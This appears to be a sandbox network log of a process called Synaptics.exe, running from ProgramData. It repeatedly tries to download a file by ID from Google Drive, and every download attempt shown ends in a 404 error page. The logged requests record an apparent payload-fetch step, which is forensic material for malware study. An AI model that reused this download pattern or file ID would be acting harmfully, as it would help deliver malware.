                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      70192.168.2.649979142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:58 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:58 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xxi5fpEPjp-9MdTebHRT6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      71192.168.2.649980142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:58 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:58 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7uckmJjbG6pRoIoO_DqJ8hSCNpSPlSVaQFTN34_8IZ47cqTHEM5AVE7cl13xdn0i_1_eZi-c0
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:58 GMT
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-CeNAxE4kT95s6BSGXV5iAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:58 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:58 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 72 53 79 51 53 71 76 4e 4d 4c 61 57 36 63 33 39 5a 67 34 36 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="XrSyQSqvNMLaW6c39Zg46A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:58 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      72192.168.2.649988142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:59 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:59 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7fnboO1oysK1SxL2f-Ld-ah3ZxOll19V2MNkCwIEoTBvbEQOP7MVLMnonkpGdQLaOq
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:59 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RAZRI47Ns8ojv8t7u_DTcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:59 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:59 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 68 65 4b 41 4a 50 44 78 7a 72 79 36 6c 34 30 6f 42 46 62 4f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="SheKAJPDxzry6l40oBFbOA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:59 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      73192.168.2.649989142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:59 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:59 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-pZ74gZh-27vWw0ueIqjBkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      74192.168.2.649993142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:59 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:59 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fGFzqDg8-NWnu-OGNzpplA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      75192.168.2.649992142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:59 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:00 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4QYR8TdrWc-hFbZ__t4OCTPKdJ6adOlF7lYCO3B-1EGA8P7SsY4303mVdAlmZdEa6E
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:59 GMT
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xlT_aRDpGHQH9k4OvRktzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:00 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:00 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 55 35 46 49 50 4e 47 70 37 42 72 4f 56 4d 4b 4f 54 52 42 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="BU5FIPNGp7BrOVMKOTRByg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:00 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      76192.168.2.650003142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:00 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:00 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC56Cshp4Xul7Ybvx4uxkl591XhqgmeJIomstq5s3UE8uZKM3kIDKwq7KOQMuuWxlow0
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:00 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZbZPziDJOT7AXu4ld74VwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:00 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
